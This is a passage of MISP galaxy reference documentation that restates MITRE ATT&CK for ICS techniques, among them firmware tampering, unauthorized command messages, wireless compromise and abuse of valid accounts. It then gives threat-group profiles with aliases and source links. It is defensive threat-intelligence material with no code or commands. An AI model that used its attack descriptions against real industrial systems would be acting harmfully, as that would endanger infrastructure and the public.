Table 6988. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://dragos.com/blog/crashoverride/CrashOverride-01.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Service Stop

Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary’s overall objectives to cause damage to the environment. Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct Data Destruction.

The tag is: misp-galaxy:mitre-ics-techniques="Service Stop"

Table 6989. Table References

Links

https://attack.mitre.org/techniques/T1489/

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/

Spearphishing Attachment

Adversaries may use a spearphishing attachment, a variant of spearphishing, as a form of a social engineering attack against specific targets. Spearphishing attachments are different from other forms of spearphishing in that they employ malware attached to an email. All forms of spearphishing are electronically delivered and target a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution and access.

The tag is: misp-galaxy:mitre-ics-techniques="Spearphishing Attachment"

Table 6990. Table References

Links

https://attack.mitre.org/techniques/T1193/

https://www.eisac.com/public-news-detail?id=115909

https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

https://www.wired.com/story/iran-hackers-us-phishing-tensions/

https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group

https://dragos.com/wp-content/uploads/Sample-WorldView-Report.pdf

https://dragos.com/wp-content/uploads/yir-ics-activity-groups-threat-landscape-2018.pdf

https://www.us-cert.gov/ncas/alerts/TA17-293A

https://dragos.com/resource/hexane/

https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf

https://www.securityweek.com/five-threat-groups-target-industrial-systems-dragos

https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/

https://www.f-secure.com/weblog/archives/00002718.html

https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf

Standard Application Layer Protocol

Adversaries may establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, RDP, telnet, DNP3, and modbus. These protocols may be used to disguise adversary actions as benign network traffic. Standard protocols may be seen on their associated port or in some cases over a non-standard port. Adversaries may use these protocols to reach out of the network for command and control, or in some cases to other infected devices within the network.

The tag is: misp-galaxy:mitre-ics-techniques="Standard Application Layer Protocol"

Table 6991. Table References

Links

https://dragos.com/resource/hexane/

https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/

https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

Supply Chain Compromise

Adversaries may perform supply chain compromise to gain control systems environment access by means of infected products, software, and workflows. Supply chain compromise is the manipulation of products, such as devices or software, or their delivery mechanisms before receipt by the end consumer. Adversary compromise of these products and mechanisms is done for the goal of data or system compromise, once infected products are introduced to the target environment. Supply chain compromise can occur at all stages of the supply chain, from manipulation of development tools and environments to manipulation of developed products and tools distribution mechanisms. This may involve the compromise and replacement of legitimate software and patches, such as on third party or vendor websites. Targeting of supply chain compromise can be done in attempts to infiltrate the environments of a specific audience. In control systems environments with assets in both the IT and OT networks, it is possible a supply chain compromise affecting the IT environment could enable further access to the OT environment. F-Secure Labs analyzed the approach the adversary used to compromise victim systems with Havex. The adversary planted trojanized software installers available on legitimate ICS/SCADA vendor websites. After being downloaded, this software infected the host computer with a Remote Access Trojan (RAT).

The tag is: misp-galaxy:mitre-ics-techniques="Supply Chain Compromise"

Table 6992. Table References

Links

https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group

https://dragos.com/wp-content/uploads/Dragos-Oil-and-Gas-Threat-Perspective-2019.pdf

https://www.f-secure.com/weblog/archives/00002718.html

System Firmware

System firmware on modern assets is often designed with an update feature. Older device firmware may be factory installed and require special reprograming equipment. When available, the firmware update feature enables vendors to remotely patch bugs and perform upgrades. Device firmware updates are often delegated to the user and may be done using a software update package. It may also be possible to perform this task over the network. An adversary may exploit the firmware update feature on accessible devices to upload malicious or out-of-date firmware. Malicious modification of device firmware may provide an adversary with root access to a device, given firmware is one of the lowest programming abstraction layers. In the 2015 attack on the Ukranian power grid, the adversaries gained access to the control networks of three different energy companies. The adversaries developed malicious firmware for the serial-to-ethernet devices which rendered them inoperable and severed connections between the control center and the substation.

The tag is: misp-galaxy:mitre-ics-techniques="System Firmware"

Table 6993. Table References

Links

http://www.sciencedirect.com/science/article/pii/S1874548213000231

https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Theft of Operational Information

Adversaries may steal operational information on a production environment as a direct mission outcome for personal gain or to inform future operations. This information may include design documents, schedules, rotational data, or similar artifacts that provide insight on operations. In the Bowman Dam incident, adversaries probed systems for operational data.

The tag is: misp-galaxy:mitre-ics-techniques="Theft of Operational Information"

Table 6994. Table References

Links

https://time.com/4270728/iran-cyber-attack-dam-fbi/

https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559

https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf

https://www.symantec.com/security-center/writeup/2012-052811-0308-99

Unauthorized Command Message

Adversaries may send unauthorized command messages to instruct control systems devices to perform actions outside their expected functionality for process control. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device’s actions. An adversary could potentially instruct a control systems device to perform an action that will cause an Impact. In the Maroochy Attack, the adversary used a dedicated analog two-way radio system to send false data and instructions to pumping stations and the central computer. In the 2015 attack on the Ukranian power grid, the adversaries gained access to the control networks of three different energy companies. The adversaries used valid credentials to seize control of operator workstations and access a distribution management system (DMS) client application via a VPN. The adversaries used these tools to issue unauthorized commands to breakers at substations which caused a loss of power to over 225,000 customers over various areas.

The tag is: misp-galaxy:mitre-ics-techniques="Unauthorized Command Message"

Table 6995. Table References

Links

http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

User Execution

Adversaries may rely on a targeted organizations’ user interaction for the execution of malicious code. User interaction may consist of installing applications, opening email attachments, or granting higher permissions to documents. Adversaries may embed malicious code or visual basic code into files such as Microsoft Word and Excel documents or software installers. Execution of this code requires that the user enable scripting or write access within the document. Embedded code may not always be noticeable to the user especially in cases of trojanized software

The tag is: misp-galaxy:mitre-ics-techniques="User Execution"

Table 6996. Table References

Links

https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf

https://www.f-secure.com/weblog/archives/00002718.html

https://www.youtube.com/watch?v=eywmb7UDODY&feature=youtu.be&t=939

https://securelist.com/bad-rabbit-ransomware/82851/

Utilize/Change Operating Mode

Adversaries may place controllers into an alternate mode of operation to enable configuration setting changes for evasive code execution or to inhibit device functionality. Programmable controllers typically have several modes of operation. These modes can be broken down into three main categories: program run, program edit, and program write. Each of these modes puts the device in a state in which certain functions are available. For instance, the program edit mode allows alterations to be made to the user program while the device is still online. By driving a device into an alternate mode of operation, an adversary has the ability to change configuration settings in such a way to cause a Impact to equipment and/or industrial process associated with the targeted device. An adversary may also use this alternate mode to execute arbitrary code which could be used to evade defenses.

The tag is: misp-galaxy:mitre-ics-techniques="Utilize/Change Operating Mode"

Table 6997. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Valid Accounts

Adversaries may steal the credentials of a specific user or service account using credential access techniques. In some cases, default credentials for control system devices may be publicly available. Compromised credentials may be used to bypass access controls placed on various resources on hosts and within the network, and may even be used for persistent access to remote systems. Compromised and default credentials may also grant an adversary increased privilege to specific systems and devices or access to restricted areas of the network. Adversaries may choose not to use malware or tools, in conjunction with the legitimate access those credentials provide, to make it harder to detect their presence or to control devices and send legitimate commands in an unintended way. Adversaries may also create accounts, sometimes using predefined account names and passwords, to provide a means of backup access for persistence. The overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) and possibly between the enterprise and operational technology environments. Adversaries may be able to leverage valid credentials from one system to gain access to another system. In the 2015 attack on the Ukranian power grid, the adversaries used valid credentials to interact directly with the client application of the distribution management system (DMS) server via a VPN and native remote access services to access employee workstations hosting HMI applications.2 The adversaries caused outages at three different energy companies, causing loss of power to over 225,000 customers over various areas.

The tag is: misp-galaxy:mitre-ics-techniques="Valid Accounts"

Table 6998. Table References

Links

https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf

https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

https://dragos.com/resource/allanite/

https://dragos.com/resource/dymalloy/

https://www.us-cert.gov/ncas/alerts/TA17-293A

https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign

https://dragos.com/resource/chrysene/

https://dragos.com/resource/electrum/

https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf

https://dragos.com/blog/trisis/TRISIS-01.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Wireless Compromise

Adversaries may perform wireless compromise as a method of gaining communications and unauthorized access to a wireless network. Access to a wireless network may be gained through the compromise of a wireless device.12 Adversaries may also utilize radios and other wireless communication devices on the same frequency as the wireless network. Wireless compromise can be done as an initial access vector from a remote distance. A joint case study on the Maroochy Shire Water Services event examined the attack from a cyber security perspective.3 The adversary disrupted Maroochy Shire’s radio-controlled sewage system by driving around with stolen radio equipment and issuing commands with them. Boden used a two-way radio to communicate with and set the frequencies of Maroochy Shire’s repeater stations. A Polish student used a modified TV remote controller to gain access to and control over the Lodz city tram system in Poland. The remote controller device allowed the student to interface with the tram’s network to modify track settings and override operator control. The adversary may have accomplished this by aligning the controller to the frequency and amplitude of IR control protocol signals. The controller then enabled initial access to the network, allowing the capture and replay of tram signals

The tag is: misp-galaxy:mitre-ics-techniques="Wireless Compromise"

Table 6999. Table References

Links

https://www.blackhat.com/docs/us-14/materials/us-14-Bolshev-ICSCorsair-How-I-Will-PWN-Your-ERP-Through-4-20mA-Current-Loop-WP.pdf

https://www.slideshare.net/dgpeters/17-bolshev-1-13

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://www.londonreconnections.com/2017/hacked-cyber-security-railways/

https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/

https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html

Intrusion Set

Name of ATT&CK Group.

Intrusion Set is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Ajax Security Team - G0130

[Ajax Security Team](https://attack.mitre.org/groups/G0130) is a group that has been active since at least 2010 and believed to be operating out of Iran. By 2014 [Ajax Security Team](https://attack.mitre.org/groups/G0130) transitioned from website defacement operations to malware-based cyber espionage campaigns targeting the US defense industrial base and Iranian users of anti-censorship technologies.(Citation: FireEye Operation Saffron Rose 2013)

The tag is: misp-galaxy:mitre-intrusion-set="Ajax Security Team - G0130"

Ajax Security Team - G0130 is also known as:

  • Ajax Security Team

  • Operation Woolen-Goldfish

  • AjaxTM

  • Rocket Kitten

  • Flying Kitten

  • Operation Saffron Rose

Table 7000. Table References

Links

https://attack.mitre.org/groups/G0130

https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf

https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf

https://iranthreats.github.io/resources/attribution-flying-rocket-kitten/

https://www.crowdstrike.com/blog/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten/

https://www.mandiant.com/sites/default/files/2021-09/rpt-operation-saffron-rose.pdf

The White Company - G0089

[The White Company](https://attack.mitre.org/groups/G0089) is a likely state-sponsored threat actor with advanced capabilities. From 2017 through 2018, the group led an espionage campaign called Operation Shaheen targeting government and military organizations in Pakistan.(Citation: Cylance Shaheen Nov 2018)

The tag is: misp-galaxy:mitre-intrusion-set="The White Company - G0089"

The White Company - G0089 is also known as:

  • The White Company

Table 7001. Table References

Links

https://attack.mitre.org/groups/G0089

https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/WhiteCompanyOperationShaheenReport.pdf?_ga=2.161661948.1943296560.1555683782-1066572390.1555511517

Threat Group-3390 - G0027

[Threat Group-3390](https://attack.mitre.org/groups/G0027) is a Chinese threat group that has extensively used strategic Web compromises to target victims.(Citation: Dell TG-3390) The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, manufacturing and gambling/betting sectors.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Securelist LuckyMouse June 2018)(Citation: Trend Micro DRBControl February 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Threat Group-3390 - G0027"

Threat Group-3390 - G0027 is also known as:

  • Threat Group-3390

  • Earth Smilodon

  • TG-3390

  • Emissary Panda

  • BRONZE UNION

  • APT27

  • Iron Tiger

  • LuckyMouse

Threat Group-3390 - G0027 has relationships with:

  • similar: misp-galaxy:threat-actor="APT27" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-tool="ipconfig - S0100" with estimative-language:likelihood-probability="almost-certain"

Table 7002. Table References

Links

http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/

https://attack.mitre.org/groups/G0027

https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf

https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/

https://securelist.com/luckymouse-hits-national-data-center/86083/

https://thehackernews.com/2018/06/chinese-watering-hole-attack.html

https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/

https://www.secureworks.com/research/bronze-union

https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage

https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html

Threat Group-1314 - G0028

[Threat Group-1314](https://attack.mitre.org/groups/G0028) is an unattributed threat group that has used compromised credentials to log into a victim’s remote access infrastructure. (Citation: Dell TG-1314)

The tag is: misp-galaxy:mitre-intrusion-set="Threat Group-1314 - G0028"

Threat Group-1314 - G0028 is also known as:

  • Threat Group-1314

  • TG-1314

Threat Group-1314 - G0028 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"

Table 7003. Table References

Links

http://www.secureworks.com/resources/blog/living-off-the-land/

https://attack.mitre.org/groups/G0028

Dragonfly 2.0 - G0074

[Dragonfly 2.0](https://attack.mitre.org/groups/G0074) is a suspected Russian group that has targeted government entities and multiple U.S. critical infrastructure sectors since at least December 2015. (Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) There is debate over the extent of overlap between [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) and [Dragonfly](https://attack.mitre.org/groups/G0035), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY )

The tag is: misp-galaxy:mitre-intrusion-set="Dragonfly 2.0 - G0074"

Dragonfly 2.0 - G0074 is also known as:

  • Dragonfly 2.0

  • IRON LIBERTY

  • DYMALLOY

  • Berserk Bear

Table 7004. Table References

Links

http://fortune.com/2017/09/06/hack-energy-grid-symantec/

https://attack.mitre.org/groups/G0074

https://www.dragos.com/threat/dymalloy/

https://www.secureworks.com/research/mcmd-malware-analysis

https://www.secureworks.com/research/threat-profiles/iron-liberty

https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group

https://www.us-cert.gov/ncas/alerts/TA18-074A

Lotus Blossom - G0030

[Lotus Blossom](https://attack.mitre.org/groups/G0030) is a threat group that has targeted government and military organizations in Southeast Asia. (Citation: Lotus Blossom Jun 2015)

The tag is: misp-galaxy:mitre-intrusion-set="Lotus Blossom - G0030"

Lotus Blossom - G0030 is also known as:

  • Lotus Blossom

  • DRAGONFISH

  • Spring Dragon

Lotus Blossom - G0030 has relationships with:

  • similar: misp-galaxy:threat-actor="LOTUS PANDA" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="Emissary - S0082" with estimative-language:likelihood-probability="almost-certain"

Table 7005. Table References

Links

https://attack.mitre.org/groups/G0030

https://securelist.com/the-spring-dragon-apt/70726/

https://www.accenture.com/t20180127T003755Z_w/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf

https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html

BRONZE BUTLER - G0060

[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)

The tag is: misp-galaxy:mitre-intrusion-set="BRONZE BUTLER - G0060"

BRONZE BUTLER - G0060 is also known as:

  • BRONZE BUTLER

  • REDBALDKNIGHT

  • Tick

BRONZE BUTLER - G0060 has relationships with:

  • similar: misp-galaxy:threat-actor="Tick" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1060" with estimative-language:likelihood-probability="almost-certain"

Table 7006. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/

https://attack.mitre.org/groups/G0060

https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf

https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses

https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan

Dark Caracal - G0070

[Dark Caracal](https://attack.mitre.org/groups/G0070) is threat group that has been attributed to the Lebanese General Directorate of General Security (GDGS) and has operated since at least 2012. (Citation: Lookout Dark Caracal Jan 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Dark Caracal - G0070"

Dark Caracal - G0070 is also known as:

  • Dark Caracal

Table 7007. Table References

Links

https://attack.mitre.org/groups/G0070

https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf

Cobalt Group - G0080

[Cobalt Group](https://attack.mitre.org/groups/G0080) is a financially motivated threat group that has primarily targeted financial institutions since at least 2016. The group has conducted intrusions to steal money via targeting ATM systems, card processing, payment systems and SWIFT systems. [Cobalt Group](https://attack.mitre.org/groups/G0080) has mainly targeted banks in Eastern Europe, Central Asia, and Southeast Asia. One of the alleged leaders was arrested in Spain in early 2018, but the group still appears to be active. The group has been known to target organizations in order to use their access to then compromise additional victims.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)(Citation: Proofpoint Cobalt June 2017)(Citation: RiskIQ Cobalt Nov 2017)(Citation: RiskIQ Cobalt Jan 2018) Reporting indicates there may be links between [Cobalt Group](https://attack.mitre.org/groups/G0080) and both the malware [Carbanak](https://attack.mitre.org/software/S0030) and the group [Carbanak](https://attack.mitre.org/groups/G0008).(Citation: Europol Cobalt Mar 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Cobalt Group - G0080"

Cobalt Group - G0080 is also known as:

  • Cobalt Group

  • GOLD KINGSWOOD

  • Cobalt Gang

  • Cobalt Spider

Table 7008. Table References

Links

https://attack.mitre.org/groups/G0080

https://blog.morphisec.com/cobalt-gang-2.0

https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html

https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report

https://web.archive.org/web/20190508170147/https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/

https://web.archive.org/web/20190508170630/https://www.riskiq.com/blog/labs/cobalt-strike/

https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain

https://www.group-ib.com/blog/cobalt

https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target

https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf

https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf

https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish

Deep Panda - G0009

[Deep Panda](https://attack.mitre.org/groups/G0009) is a suspected Chinese threat group known to target many industries, including government, defense, financial, and telecommunications. (Citation: Alperovitch 2014) The intrusion into healthcare company Anthem has been attributed to [Deep Panda](https://attack.mitre.org/groups/G0009). (Citation: ThreatConnect Anthem) This group is also known as Shell Crew, WebMasters, KungFu Kittens, and PinkPanther. (Citation: RSA Shell Crew) [Deep Panda](https://attack.mitre.org/groups/G0009) also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion. (Citation: Symantec Black Vine) Some analysts track [Deep Panda](https://attack.mitre.org/groups/G0009) and [APT19](https://attack.mitre.org/groups/G0073) as the same group, but it is unclear from open source information if the groups are the same. (Citation: ICIT China’s Espionage Jul 2016)

The tag is: misp-galaxy:mitre-intrusion-set="Deep Panda - G0009"

Deep Panda - G0009 is also known as:

  • Deep Panda

  • Shell Crew

  • WebMasters

  • KungFu Kittens

  • PinkPanther

  • Black Vine

Deep Panda - G0009 has relationships with:

  • similar: misp-galaxy:threat-actor="HURRICANE PANDA" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="APT19" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1086" with estimative-language:likelihood-probability="almost-certain"

Table 7009. Table References

Links

https://attack.mitre.org/groups/G0009

https://web.archive.org/web/20170823094836/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf

https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/

https://web.archive.org/web/20200424075623/https:/www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/

https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf

https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/

Wizard Spider - G0102

[Wizard Spider](https://attack.mitre.org/groups/G0102) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://attack.mitre.org/software/S0266) since at least 2016. [Wizard Spider](https://attack.mitre.org/groups/G0102) possesses a diverse aresenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: CrowdStrike Wizard Spider October 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Wizard Spider - G0102"

Wizard Spider - G0102 is also known as:

  • Wizard Spider

  • UNC1878

  • TEMP.MixMaster

  • Grim Spider

  • FIN12

  • GOLD BLACKBURN

  • ITG23

  • Periwinkle Tempest

Table 7010. Table References

Links

https://attack.mitre.org/groups/G0102

https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/

https://us-cert.cisa.gov/ncas/alerts/aa20-302a

https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/

https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/

https://www.crowdstrike.com/blog/wizard-spider-adversary-update/

https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

https://www.mandiant.com/sites/default/files/2021-10/fin12-group-profile.pdf

https://www.secureworks.com/research/threat-profiles/gold-blackburn

Ember Bear - G1003

[Ember Bear](https://attack.mitre.org/groups/G1003) is a suspected Russian state-sponsored cyber espionage group that has been active since at least March 2021. [Ember Bear](https://attack.mitre.org/groups/G1003) has primarily focused their operations against Ukraine and Georgia, but has also targeted Western European and North American foreign ministries, pharmaceutical companies, and financial sector organizations. Security researchers assess [Ember Bear](https://attack.mitre.org/groups/G1003) likely conducted the [WhisperGate](https://attack.mitre.org/software/S0689) destructive wiper attacks against Ukraine in early 2022.(Citation: CrowdStrike Ember Bear Profile March 2022)(Citation: Mandiant UNC2589 March 2022)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )

The tag is: misp-galaxy:mitre-intrusion-set="Ember Bear - G1003"

Ember Bear - G1003 is also known as:

  • Ember Bear

  • Saint Bear

  • UNC2589

  • UAC-0056

  • Lorec53

  • Lorec Bear

  • Bleeding Bear

Table 7011. Table References

Links

https://attack.mitre.org/groups/G1003

https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/

https://www.crowdstrike.com/blog/who-is-ember-bear/

https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation

Dust Storm - G0031

[Dust Storm](https://attack.mitre.org/groups/G0031) is a threat group that has targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. (Citation: Cylance Dust Storm)

The tag is: misp-galaxy:mitre-intrusion-set="Dust Storm - G0031"

Dust Storm - G0031 is also known as:

  • Dust Storm

Dust Storm - G0031 has relationships with:

  • similar: misp-galaxy:threat-actor="Dust Storm" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 7012. Table References

Links

https://attack.mitre.org/groups/G0031

https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf

Night Dragon - G0014

[Night Dragon](https://attack.mitre.org/groups/G0014) is a campaign name for activity involving a threat group that has conducted activity originating primarily in China. (Citation: McAfee Night Dragon)

The tag is: misp-galaxy:mitre-intrusion-set="Night Dragon - G0014"

Night Dragon - G0014 is also known as:

  • Night Dragon

Night Dragon - G0014 has relationships with:

  • similar: misp-galaxy:threat-actor="Night Dragon" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="gh0st RAT - S0032" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 7013. Table References

Links

https://attack.mitre.org/groups/G0014

https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf

Earth Lusca - G1006

[Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)

The tag is: misp-galaxy:mitre-intrusion-set="Earth Lusca - G1006"

Earth Lusca - G1006 is also known as:

  • Earth Lusca

  • TAG-22

Table 7014. Table References

Links

https://attack.mitre.org/groups/G1006

https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf

Aoqin Dragon - G1007

